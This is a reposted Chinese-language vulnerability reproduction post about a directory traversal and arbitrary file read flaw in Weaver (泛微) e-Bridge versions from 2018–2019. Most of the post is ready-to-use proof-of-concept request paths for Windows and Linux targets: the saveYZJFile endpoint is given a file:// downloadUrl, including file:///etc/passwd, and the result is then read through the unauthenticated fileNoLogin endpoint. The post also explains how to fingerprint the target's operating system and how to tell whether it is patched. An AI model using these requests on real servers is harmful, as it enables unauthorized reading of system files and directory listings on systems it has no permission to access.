泛微雲橋e-Bridge 目錄遍歷，任意文件讀取

本文轉載自查看原文 2020-11-21 23:45 544 漏洞復現/ 時間 2020

2018-2019 多個版本。

泛微雲橋

如果使用POC回顯"無法驗證您的身份！"證明改漏洞已被修復
POC中，當downloadUrl的路徑為文件夾的時候結果為目錄遍歷 linux windows 通用
Windows POC：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt #查看頁面中的id值

/file/fileNoLogin/<id> #訪問文件接口，根據上一步獲取的id對文件內容進行讀取

如果提示msg "/C: (No such file or directory)" 就表示為Linux系統（表示不存在C盤）
Linux POC：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/file/fileNoLogin/<id> #訪問文件接口，根據上一步獲取的id對文件內容進行讀取

Linux系統主目錄（根目錄）

Linux中/ect/passwd文件

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 泛微OA雲橋未授權任意文件讀取目錄瀏覽(目錄遍歷)漏洞和任意文件讀取/下載漏洞任意文件讀取和上傳 WEB安全第二篇--用文件搞定服務器：任意文件上傳、文件包含與任意目錄文件遍歷 FFmpeg任意文件讀取漏洞分析 ThinkAdminV6未授權列目錄、任意文件讀取漏洞復現 apache flink任意文件讀取&文件上傳漏洞復現 [HCTF 2018]WarmUp PHP審計+任意文件讀取 Apache Solr任意文件讀取漏洞復現 Grafana 任意文件讀取漏洞（CVE-2021-43798）